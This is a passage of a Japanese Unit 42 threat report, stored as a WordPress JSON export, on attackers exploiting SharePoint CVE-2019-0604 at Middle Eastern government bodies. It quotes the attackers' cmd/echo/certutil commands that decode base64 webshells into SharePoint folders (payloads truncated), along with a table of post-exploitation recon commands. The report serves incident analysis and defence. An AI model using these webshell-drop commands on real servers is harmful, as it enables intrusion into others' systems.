{"id":103727,"date":"2020-02-04T01:34:04","date_gmt":"2020-02-04T09:34:04","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=103727"},"modified":"2020-02-04T01:34:04","modified_gmt":"2020-02-04T09:34:04","slug":"actors-still-exploiting-sharepoint-vulnerability","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/actors-still-exploiting-sharepoint-vulnerability\/","title":{"rendered":"SharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f\u4e2d\u6771\u653f\u5e9c\u95a2\u9023\u7d44\u7e54\u3078\u306e\u653b\u6483\u306f\u3044\u307e\u3060\u7d99\u7d9a\u4e2d"},"content":{"rendered":"<h2><a id=\"post-103727-executive-summary\"><\/a>\u6982\u8981<\/h2>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u8abf\u67fb\u30c1\u30fc\u30e0Uint 42\u306f\u30012019\u5e749\u670810\u65e5\u3001<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-0604\">CVE-2019-0604<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308bSharePoint\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3059\u308b\u672a\u77e5\u306e\u653b\u6483\u8005\u304c\u3001\u4e2d\u6771\u306e\u653f\u5e9c\u6a5f\u95a2\u306eweb\u30b5\u30a4\u30c8\u306b\u8907\u6570\u306ewebshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u69d8\u5b50\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306ewebshell\u306e1\u3064\u306f<a href=\"https:\/\/github.com\/AntSwordProject\/antSword\">Github\u304b\u3089\u7121\u6599\u3067\u5229\u7528\u3067\u304d\u308b\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u306eAntSword webshell<\/a>\u3067\u3001\u60aa\u540d\u9ad8\u3044China Chopper\u306ewebshell\u306b\u6975\u3081\u3066\u3088\u304f\u4f3c\u3066\u3044\u308b\u3082\u306e\u3067\u3059\u3002<\/p>\n<p>2020\u5e741\u670810\u65e5\u3001\u79c1\u305f\u3061\u306fShodan\u3092\u4f7f\u7528\u3057\u3001CVE-2019-0604\u306b\u5bfe\u3057\u3066\u8106\u5f31\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u306eSharePoint\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u304b\u3089\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u306a\u30b5\u30fc\u30d0\u30fc\u3092\u691c\u7d22\u3057\u307e\u3057\u305f\u3002HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u5185\u3067SharePoint\u304c\u793a\u3059\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u5fc5\u305a\u3057\u3082\u6b63\u78ba\u3067\u306a\u3044\u5834\u5408\u304c\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u3053\u3067\u306f\u3072\u3068\u307e\u305a\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306b\u3057\u3001<a href=\"https:\/\/portal.msrc.microsoft.com\/en-US\/security-guidance\/advisory\/CVE-2019-0604\">Microsoft\u306e\u30a2\u30c9\u30d0\u30a4\u30b6\u30ea<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u4fee\u6b63\u66f4\u65b0\u6e08\u307fSharePoint\u30d0\u30fc\u30b8\u30e7\u30f3\u3088\u308aHTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u5185\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u304c\u53e4\u3044\u304b\u3069\u3046\u304b\u3092\u6bd4\u8f03\u3059\u308b\u3053\u3068\u306b\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u7d50\u679c\u3001HTTP\u30ec\u30b9\u30dd\u30f3\u30b9\u5185\u306b\u8106\u5f31\u6027\u306e\u3042\u308bSharePoint\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u756a\u53f7\u3092\u8fd4\u3057\u305f\u30b5\u30fc\u30d0\u30fc\u306f28,881\u53f0\u898b\u3064\u304b\u308a\u307e\u3057\u305f\u3002\u306a\u304a\u3053\u3053\u3067\u306f\u3001\u3053\u308c\u3089\u306e\u30b5\u30fc\u30d0\u30fc\u3092\u500b\u5225\u30c1\u30a7\u30c3\u30af\u3057\u3066\u5b9f\u969b\u306b\u8106\u5f31\u6027\u304c\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u7a4d\u6975\u7684\u306b\u306f\u78ba\u8a8d\u3057\u3066\u3044\u307e\u305b\u3093\u3002\u3053\u306e\u305f\u3081\u3001\u3053\u308c\u3089\u516c\u958bSharePoint\u30b5\u30fc\u30d0\u30fc\u306e\u591a\u304f\u306f\u8106\u5f31\u6027\u304c\u306a\u3044\u304b\u3001\u66f4\u65b0\u30d7\u30ed\u30b0\u30e9\u30e0\u9069\u7528\u6e08\u307f\u306e\u53ef\u80fd\u6027\u306f\u3042\u308a\u307e\u3059\u3002\u3068\u306f\u3044\u3048\u3001\u30b5\u30fc\u30d0\u30fc\u6570\u304c\u591a\u304f\u3001\u516c\u958b\u6e08\u307f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u30b3\u30fc\u30c9\u304c\u8c4a\u5bcc\u306a\u3053\u3068\u304b\u3089\u3001CVE-2019-0604\u306f\u4f9d\u7136\u3068\u3057\u3066\u3088\u304f\u5229\u7528\u3055\u308c\u308b\u653b\u6483\u30d9\u30af\u30c8\u30eb\u3067\u3059\u3002<\/p>\n<p>\u3053\u308c\u3089\u4e00\u9023\u306ewebshell\u3092\u4f7f\u7528\u3057\u3066\u653b\u6483\u8005\u305f\u3061\u306f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u4e0a\u306e\u4ed6\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u6a2a\u5c55\u958b\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u3055\u3044\u3001\u60aa\u540d\u9ad8\u3044Mimikatz\u30c4\u30fc\u30eb\u4e9c\u7a2e\u3067\u8cc7\u683c\u60c5\u5831\u3092\u30c0\u30f3\u30d7\u3057\u3001\u30c0\u30f3\u30d7\u3057\u305f\u8cc7\u683c\u60c5\u5831\u3092\u5229\u7528\u3057\u3066<a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/atexec.py\">Impacket\u306eatexec\u30c4\u30fc\u30eb<\/a>\u306b\u3088\u308a\u4ed6\u306e\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u307e\u305f2019\u5e749\u670819\u65e5\u306b\u306f\u3001\u4e2d\u6771\u306e\u307e\u305f\u5225\u306e\u56fd\u306e\u3042\u308b\u653f\u5e9c\u6a5f\u95a2\u306b\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u305fwebshell\u306b\u3001\u307e\u3063\u305f\u304f\u540c\u3058Mimikatz\u4e9c\u7a2e\u304c\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3082\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u30892\u3064\u306e\u7d44\u7e54\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u305fMimikatz\u4e9c\u7a2e\u306f\u3001.NET\u3067\u8a18\u8ff0\u3055\u308c\u305f\u30ab\u30b9\u30bf\u30e0\u30ed\u30fc\u30c0\u30fc\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u542b\u3080\u70b9\u304c\u7279\u7570\u306a\u3082\u306e\u3067\u3059\u3002\u3057\u305f\u304c\u3063\u3066\u79c1\u305f\u3061\u306f\u540c\u3058\u8105\u5a01\u653b\u6483\u30b0\u30eb\u30fc\u30d7\u304c\u4e21\u65b9\u306e\u4fb5\u5165\u306e\u80cc\u5f8c\u306b\u3044\u308b\u3068\u8003\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u79c1\u305f\u3061\u304c\u6700\u521d\u306b\u4e2d\u67712\u304b\u56fd\u306e\u653f\u5e9c\u6a5f\u95a2\u306e<a href=\"https:\/\/unit42.paloaltonetworks.com\/emissary-panda-attacks-middle-east-government-sharepoint-servers\/\">SharePoint\u30b5\u30fc\u30d0\u30fc\u306bCVE-2019-0604\u3092\u60aa\u7528\u3057\u3066webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308bEmissary Panda\u8105\u5a01\u653b\u6483\u30b0\u30eb\u30fc\u30d7<\/a>\u3092\u78ba\u8a8d\u3057\u305f\u306e\u306f2019\u5e744\u6708\u306e\u3053\u3068\u3067\u3057\u305f\u3002\u3053\u308c\u3092\u73fe\u5728\u306e\u653b\u6483\u307e\u30675\u304b\u6708\u65e9\u9001\u308a\u3057\u30664\u6708\u306e\u653b\u6483\u3068\u6bd4\u8f03\u3057\u3066\u307f\u308b\u3068\u3001\u7570\u306a\u308b2\u3064\u306e\u56fd\u306e\u653f\u5e9c\u6a5f\u95a2\u3067\u540c\u4e00\u306e\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002\u306a\u304a\u3001\u5f53\u8a72SharePoint\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u305f2019\u5e749\u6708\u306e\u653b\u6483\u30682019\u5e744\u6708\u306b\u884c\u308f\u308c\u305fEmissary Panda\u306b\u3088\u308b\u653b\u6483\u3068\u306e\u9593\u306b\u306f\u3001\u3068\u304f\u306b\u4f55\u304b\u5f37\u3044\u7d50\u3073\u3064\u304d\u304c\u3042\u308b\u3068\u306f\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u305f\u3057\u304b\u306b\u3053\u308c\u30892\u3064\u306e\u4e00\u9023\u306e\u653b\u6483\u3067\u306f\u3001\u60aa\u7528\u3055\u308c\u305f\u8106\u5f31\u6027\u306e\u7a2e\u985e\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3001\u88ab\u5bb3\u3092\u53d7\u3051\u305f\u653f\u5e9c\u7d44\u7e54\u50cf\u306a\u3069\u306e\u91cd\u8907\u304c\u898b\u3089\u308c\u307e\u3059\u304c\u3001\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u9593\u3092\u3064\u306a\u3050\u5f37\u529b\u306a\u30d4\u30dc\u30c3\u30c8\u306f\u3068\u304f\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<p>\u3068\u3044\u3046\u306e\u3082\u3001\u3053\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3059\u308b\u306e\u306fEmissary Panda\u306b\u9650\u3063\u305f\u3053\u3068\u3067\u306f\u306a\u304f\u3001\u540c\u3058\u8106\u5f31\u6027\u3092\u4f7f\u7528\u3057\u3066SharePoint\u30b5\u30fc\u30d0\u30fc\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3057\u3001\u6a19\u7684\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3078\u306e\u6700\u521d\u306e\u8db3\u304c\u304b\u308a\u3092\u78ba\u4fdd\u3059\u308b\u8105\u5a01\u653b\u6483\u30b0\u30eb\u30fc\u30d7\u306f\u8907\u6570\u3044\u308b\u304b\u3089\u3067\u3059\u3002\u305f\u3060\u3057\u30014\u6708\u306e\u653b\u6483\u3067Emissary Panda\u306fChina Chopper\u3092\u4f7f\u7528\u3057\u3066\u304a\u308a\u3001AntSword\u3068China Chopper\u306ewebshell\u306f\u9a5a\u304f\u307b\u3069\u4f3c\u304b\u3088\u3063\u3066\u3044\u308b\u306e\u3067\u3001AntSword\u306ewebshell\u304c\u91cd\u8907\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u306b\u3064\u3044\u3066\u306f\u8a8d\u3081\u3066\u3088\u3044\u3060\u308d\u3046\u3068\u8003\u3048\u3066\u3044\u307e\u3059\u3002\u305f\u3060\u73fe\u6642\u70b9\u3067\u306f\u3001SharePoint\u30b5\u30fc\u30d0\u30fc\u3067\u5206\u6790\u3055\u308c\u305f\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8(\u75d5\u8de1)\u304b\u3089\u30014\u6708\u306e\u653b\u6483\u3067AntSword\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u3082\u306e\u3068\u306f\u8003\u3048\u3066\u3044\u307e\u305b\u3093\u3002\u5177\u4f53\u7684\u306b\u306f\u30014\u6708\u306e\u653b\u6483\u3067\u306eIIS\u30ed\u30b0\u306b\u306fwebshell\u306b\u5bfe\u3059\u308b\u30ea\u30af\u30a8\u30b9\u30c8\u3067AntSword\u306eUser-Agent\u306f\u4e00\u5207\u898b\u3089\u308c\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001\u73fe\u5728\u306e\u653b\u6483\u3067\u306f\u3053\u306eAntSword\u306eUser-Agent\u304c\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u672c\u7a3f\u306b\u8aac\u660e\u3057\u305f\u8105\u5a01\u306b\u3088\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3068C2\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304b\u3089\u3001Threat Prevention\u30b7\u30b0\u30cd\u30c1\u30e3\u3068WildFire\u306b\u3088\u3063\u3066\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u4fdd\u8b77\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u672c\u7a3f\u306e\u7d50\u8ad6\u90e8\u306b\u8a18\u8f09\u3057\u307e\u3059\u3002<\/p>\n<h3><a id=\"post-103727-exploiting-cve-2019-0604\"><\/a>CVE-2019-0604\u306e\u60aa\u7528<\/h3>\n<p>2019\u5e749\u670810\u65e5\u3001\u79c1\u305f\u3061\u306f\u4ee5\u4e0b\u306eURL\u3078\u306eHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u79c1\u305f\u3061\u306f\u3053\u308c\u3092\u3001\u516c\u958b\u6e08\u307fSharePoint\u30b5\u30fc\u30d0\u30fc\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1190\/\">T1190<\/a>\uff09\u306b\u5bfe\u3059\u308bCVE-2019-0604\u306e\u60aa\u7528\u3068\u8003\u3048\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">&lt;\u30c9\u30e1\u30a4\u30f3\u540d\u7701\u7565&gt;\/_layouts\/15\/picker.aspx<\/span><\/p>\n<p>\u4e0a\u8a18HTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u5185\u3067\u9001\u4fe1\u3055\u308c\u305f\u30c7\u30fc\u30bf\u306b\u306f\u30a2\u30af\u30bb\u30b9\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001\u30a4\u30f3\u30d0\u30a6\u30f3\u30c9\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u304c\u767a\u751f\u3057\u305f\u6642\u70b9\u3067\u3001SharePoint\u30b5\u30fc\u30d0\u30fc\u4e0a\u3067\u306f\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">C:\\Windows\\System32\\cmd.exe \/c echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBEZWJ1Zz0idHJ1ZSIgVHJhY2U9ImZhbHNlIiAlPg[..snip..] &gt; c:\\programdata\\cmd.txt &amp; certutil -decode c:\\programdata\\cmd.txt C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\14\\TEMPLATE\\LAYOUTS\\c.aspx &amp; certutil -decode c:\\programdata\\cmd.txt C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS\\c.aspx &amp; certutil -decode c:\\programdata\\cmd.txt C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\c.aspx<\/span><\/p>\n<p>\u4e0a\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u306f echo \u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u3044\u3001base64\u30a8\u30f3\u30b3\u30fc\u30c9\u6e08\u307f\u5927\u304d\u306a\u30c7\u30fc\u30bf\u30c1\u30e3\u30f3\u30af\u3092 cmd.txt\u3068\u3044\u3046\u540d\u524d\u306e\u30c6\u30ad\u30b9\u30c8\u30d5\u30a1\u30a4\u30eb\u306b\u66f8\u304d\u8fbc\u3093\u3067\u3044\u307e\u3059\u3002\u305d\u306e\u5f8c\u3053\u306e\u30b3\u30de\u30f3\u30c9\u306f certutil \u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u3044\u3001 cmd.txt \u5185\u306ebase64\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30c7\u30fc\u30bf (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1132\/\">T1132<\/a>) \u30923\u3064\u306e\u7570\u306a\u308bSharePoint\u95a2\u9023\u30d5\u30a9\u30eb\u30c0\u5185\u306e c.aspx \u306b\u5909\u63db\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30b3\u30de\u30f3\u30c9\u304c\u3059\u3079\u3066\u5b9f\u884c\u3055\u308c\u308b\u3068\u3001<a href=\"https:\/\/github.com\/SecWiki\/WebShell-2\/blob\/master\/Aspx\/awen%20asp.net%20webshell.aspx\">Awen asp.net Webshell<\/a>\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1100\/\">T1100<\/a>\uff09\u306e\u4e9c\u7a2e\u304cSharePoint\u30b5\u30fc\u30d0\u30fc\u306b\u4fdd\u5b58\u3055\u308c\u3001\u3053\u3053\u304b\u3089\u4fb5\u5bb3\u6e08\u307f\u306e\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u5bfe\u8a71\u304c\u3055\u3089\u306b\u884c\u308f\u308c\u307e\u3059\u3002\u3053\u306eSharePoint\u8106\u5f31\u6027\u306e\u60aa\u7528\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308bAwen webshell\u306eSHA256\u30cf\u30c3\u30b7\u30e5\u5024\u306f5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21\u3067\u3059\u3002<\/p>\n<h3><a id=\"post-103727-actors-awen-webshell\"><\/a>\u653b\u6483\u8005\u306eAwen webshell<\/h3>\n<p>CVE-2019-0604\u306e\u60aa\u7528\u304c\u7591\u308f\u308c\u305f\u653b\u6483\u304b\u3089\u308f\u305a\u304b40\u79d2\u5f8c\u3001\u79c1\u305f\u3061\u306fc.aspx\u306b\u30db\u30b9\u30c8\u3055\u308c\u305fwebshell\u3078\u306e\u6700\u521d\u306eHTTP GET\u30ea\u30af\u30a8\u30b9\u30c8\u304c\u767a\u884c\u3055\u308c\u305f\u3053\u3068\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306f<a href=\"https:\/\/github.com\/SecWiki\/WebShell-2\/blob\/master\/Aspx\/awen%20asp.net%20webshell.aspx\">\u7121\u6599\u3067\u5229\u7528\u53ef\u80fd\u306aawen asp.net webshell<\/a>\u3092\u5909\u66f4\u3057\u305f\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306eHTTP GET\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u653b\u6483\u8005\u304c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u958b\u59cb\u5f8c\u3001\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u524d\u306bwebshell\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u3044\u305f\u3068\u304d\u306e\u3082\u306e\u3068\u8003\u3048\u3089\u308c\u307e\u3059\u3002\u56f31\u306f\u3001\u30b3\u30de\u30f3\u30c9\u30d7\u30ed\u30f3\u30d7\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3078\u306e\u30d1\u30b9\u8a2d\u5b9a\u3068\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u4ee5\u5916\u306e\u6a5f\u80fd\u3092\u307b\u3068\u3093\u3069\u6301\u305f\u306a\u3044Awen webshell\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><img width=\"1024\" height=\"465\"  class=\"wp-image-103730 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex.png\" alt=\"Figure 1 Awen webshell installed by actor after exploiting CVE-2019-0604\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex-300x136.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex-768x349.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex-900x409.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-1-awen-webshell-installed-by-actor-after-ex-370x168.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f31 CVE-2019-0604\u60aa\u7528\u5f8c\u306b\u653b\u6483\u8005\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305fAwen webshell<\/span><\/p>\n<p>\u653b\u6483\u8005\u306f\u3001\u56f31\u306b\u793a\u3059Awen webshell\u3092\u4f7f\u7528\u3057\u3066\u3055\u307e\u3056\u307e\u306a\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3001\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1033\/\">T1033<\/a>\u3001<a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/\">T1087<\/a>\uff09\u3001\u30d5\u30a1\u30a4\u30eb\u3084\u30d5\u30a9\u30eb\u30c0\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/\">T1083<\/a>\uff09\u3001\u7279\u6a29\u30b0\u30eb\u30fc\u30d7\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/\">T1069<\/a>\uff09\u3001\u30ea\u30e2\u30fc\u30c8\u30b7\u30b9\u30c6\u30e0\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1018\/\">T1018<\/a>\uff09\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u69cb\u6210\uff08<a href=\"https:\/\/attack.mitre.org\/techniques\/T1016\/\">T1016<\/a>\uff09\u306a\u3069\u3092\u306f\u3058\u3081\u3068\u3059\u308b\u521d\u671f\u60c5\u5831\u3092\u898b\u3064\u3051\u51fa\u3057\u307e\u3059\u3002\u88681\u306b\u3001\u3053\u306e\u521d\u671f\u60c5\u5831\u767a\u898b\u7528\u306e\u30b3\u30de\u30f3\u30c9\u306e\u307b\u304b\u3001\u30b5\u30fc\u30d0\u30fc\u306b\u5225\u306ewebshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9\u985e\u3092\u793a\u3057\u307e\u3057\u305f\u3002\u305f\u3068\u3048\u3070echo\u30b3\u30de\u30f3\u30c9(base64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092a.txt\u306b\u66f8\u304d\u8fbc\u3080)\u3001certutil\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3(bitreeview.aspx\u3092\u30c7\u30b3\u30fc\u30c9\u3057\u3066\u4fdd\u5b58\u3059\u308b)\u306a\u3069\u3067\u3059\u3002\u3053\u306e\u307b\u304b\u88681\u306b\u306f\u3001Awen webshell\u3067\u5b9f\u884c\u3055\u308c\u305f\u524d\u5f8c\u306e\u30b3\u30de\u30f3\u30c9\u306e\u6642\u9593\u5dee(\u30c7\u30eb\u30bf)\u3092\u793a\u3057\u3001\u653b\u6483\u8005\u306b\u3088\u308b\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u30b9\u30d4\u30fc\u30c9\u304c\u308f\u304b\u308a\u3084\u3059\u3044\u3088\u3046\u306b\u3057\u3066\u3042\u308a\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u524d\u306e\u30b3\u30de\u30f3\u30c9\u304b\u3089\u306e\u6642\u9593\u5dee<\/strong><\/td>\n<td><strong>\u30b3\u30de\u30f3\u30c9<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\uff08\u6700\u521d\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304b\u3089\uff093\u520655\u79d2<\/td>\n<td>dir c:\\programdata\\<\/td>\n<\/tr>\n<tr>\n<td>14\u79d2<\/td>\n<td>query user<\/td>\n<\/tr>\n<tr>\n<td>15\u79d2<\/td>\n<td>net group \/do<\/td>\n<\/tr>\n<tr>\n<td>32\u79d2<\/td>\n<td>whoami<\/td>\n<\/tr>\n<tr>\n<td>18\u79d2<\/td>\n<td>net user &lt;redacted hostname&gt; \/do<\/td>\n<\/tr>\n<tr>\n<td>12\u79d2<\/td>\n<td>net localgroup administrators<\/td>\n<\/tr>\n<tr>\n<td>21\u79d2<\/td>\n<td>ping -n 1 8.8.8.8<\/td>\n<\/tr>\n<tr>\n<td>20\u79d2<\/td>\n<td>net group exchange servers \/do<\/td>\n<\/tr>\n<tr>\n<td>22\u79d2<\/td>\n<td>ipconfig \/all<\/td>\n<\/tr>\n<tr>\n<td>23\u79d2<\/td>\n<td>ping -n 1 -a 10.x.x.x<\/td>\n<\/tr>\n<tr>\n<td>10\u520653\u79d2<\/td>\n<td>echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQi[..snip..] &gt; c:\\programdata\\a.txt<\/td>\n<\/tr>\n<tr>\n<td>5\u79d2<\/td>\n<td>type c:\\programdata\\a.txt<\/td>\n<\/tr>\n<tr>\n<td>5\u79d2<\/td>\n<td>certutil -decode c:\\programdata\\a.txt c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\template\\layouts\\bitreeview.aspx<\/td>\n<\/tr>\n<tr>\n<td>23\u79d2<\/td>\n<td>del c:\\programdata\\a.txt<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88681 CVE-2019-0604\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u5f8c\u306b\u653b\u6483\u8005\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305fAwen webshell<\/em><\/span><\/p>\n<p>bitreeview.aspx\u3068\u3044\u3046\u540d\u524d\u306ewebshell\u304c\u3001SharePoint\u30b5\u30fc\u30d0\u30fc\u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30d1\u30b9\u5185\u306e\u30d5\u30a9\u30eb\u30c0\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306ebitreeview.aspx\u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u60aa\u540d\u9ad8\u3044China Chopper webshell\u3068\u660e\u3089\u304b\u306b\u985e\u4f3c\u3057\u305f\u7279\u5fb4\u3092\u6301\u3064AntSword webshell\u306e\u4e9c\u7a2e\u3067\u3059\u3002\u3053\u306e\u653b\u6483\u8005\u306fAntSword webshell\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u305f\u5f8c\u306fAwen webshell\u3092\u5229\u7528\u3057\u307e\u305b\u3093\u3002Awen webshell\u306b\u6700\u5f8c\u306e\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3066\u304b\u308935\u79d2\u5f8c\u306b\u6700\u521d\u306e\u30b3\u30de\u30f3\u30c9\u3092AntSword\u306b\u767a\u884c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h3><a 